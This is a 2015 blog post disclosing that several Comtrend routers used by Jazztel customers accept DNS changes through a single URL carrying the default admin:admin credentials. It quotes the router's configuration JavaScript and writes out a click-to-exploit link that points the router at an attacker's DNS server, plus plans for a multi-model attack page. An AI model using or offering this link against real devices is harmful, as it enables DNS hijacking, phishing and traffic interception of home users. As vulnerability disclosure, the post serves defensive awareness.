Sunday, August 16, 2015

Poor security in SOHO routers, again. Changing configuration parameters with a click

It is well known by all the poor security of SOHO routers distributed by ISPs. Vulnerabilities, default passwords,… These routers expose inexperienced users to be hacked.

I want to share here a method which I have been playing that would let us to configure some router models when a user clicks a link created by us. I have not read about this method on the internet, sorry if I am wrong and it’s not new. The method is quite simple. It is usual to find routers with default passwords. And these devices usually offers a HTTP based interface to configure them. And some models accept configuration parameters through the URL.


Here it is the VR-3025un’s menu for DNS configuration:



If we see the source code of the web we can see the javascript code that validates the DNS addresses and calls the CGI to set the configuration:


function btnApply() {
  var loc = 'dnscfg.cgi?';
  with ( document.forms[0] ) {
    if ( isValidIpAddress(dnsPrimary.value) == false ) {
      alert('Primary DNS "' + dnsPrimary.value + '" has invalid IP address.');
      return;
    }
    loc += 'dnsPrimary=' + dnsPrimary.value;
    if (dnsSecondary.value != '') {
      if ( isValidIpAddress(dnsSecondary.value) == false ) {
        alert('Secondary DNS "' + dnsSecondary.value + '" has invalid IP address.');
        return;
      }
      loc += '&dnsSecondary=' + dnsSecondary.value;
    }
    else
      loc += '&dnsSecondary=' + '0.0.0.0';
    loc += '&dnsRefresh=1';
  }
  loc += '&sessionKey=' + sessionKey;
  var code = 'location="' + loc + '"';
  eval(code);
}
The default user:password for this router is admin:admin. The default ip address for the network router is 192.168.1.1.

If the user clicks this simple URL (for example if he receives it by email), our malicious DNS server will be set to the device:

http://admin:admin@192.168.1.1/dnscfg.cgi?dnsRefresh=1&dnsPrimary=<ip_address_malicious_dns_server>&dnsSecondary=<ip_address_malicious_dns_server2>

Other configurations could be modified too (proxies, DMZ, WAN interface access,…).

(Note in the javascript code, a sessionKey is used. It seems to be ignored by dnscfg.cgi and the new DNS configuration is set with no problems).

Models tested:
Comtrend VR-3025un
Comtrend AR-5387un
Comtrend AR-5381un

These routers are currently being used by many jazztel ISP’s clients in Spain (maybe other ISPs in other countries use these models too).

Almost sure, other comtrend models are vulnerable. And probably, models from other manufacturers are vulnerable to this method too (adapting the URL to the specific device). I will test other models as soon as possible and update my blog. It could be possible to prepare a html webpage with frames to try multiple malicious links (for example the webpage would load a frame that loads the malicious link that i commented previously for comtrend models, other frame for other models, etc…). It goes to the TODO list too 😄

Mitigation:

Internet Explorer doesn’t accept username and password in the URL (I mean the syntax http://user:password@domain.com). Currently chrome and firefox are accepting username and password in the URL. I don’t know about other browsers.

No comments:

Post a Comment